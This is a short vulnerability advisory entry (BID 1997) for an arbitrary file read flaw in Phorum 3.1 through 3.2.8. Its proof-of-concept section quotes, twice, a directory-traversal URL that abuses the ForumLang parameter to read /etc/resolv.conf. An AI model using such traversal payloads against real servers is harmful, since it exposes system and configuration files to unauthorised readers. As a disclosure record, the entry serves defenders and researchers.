Phorum Arbitrary File Read Vulnerability
BID:1997
Info
Phorum Arbitrary File Read Vulnerability
| Bugtraq ID: | 1997 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 24 2000 12:00AM |
| Updated: | Nov 24 2000 12:00AM |
| Credit: | First posted to Bugtraq by Joao Gouveia <[email protected]> on Nov 24, 2000. |
| Vulnerable: |
Phorum Phorum 3.2.8 Phorum Phorum 3.2.7 Phorum Phorum 3.2.6 Phorum Phorum 3.2.5 Phorum Phorum 3.2.4 Phorum Phorum 3.2.3 b Phorum Phorum 3.2.3 a Phorum Phorum 3.2.3 Phorum Phorum 3.2.2 Phorum Phorum 3.2 Phorum Phorum 3.1.2 Phorum Phorum 3.1.1 rc2 Phorum Phorum 3.1.1 pre Phorum Phorum 3.1.1 a Phorum Phorum 3.1.1 Phorum Phorum 3.1 |
| Not Vulnerable: | |
Exploit / POC
Phorum Arbitrary File Read Vulnerability
From Chris Kennedy's post to Bugtraq:
http://phorum.org/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf
From Chris Kennedy's post to Bugtraq:
http://phorum.org/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf